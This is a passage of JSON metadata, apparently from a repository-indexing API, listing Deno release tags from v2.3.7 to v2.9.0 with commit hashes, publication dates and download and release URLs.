tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno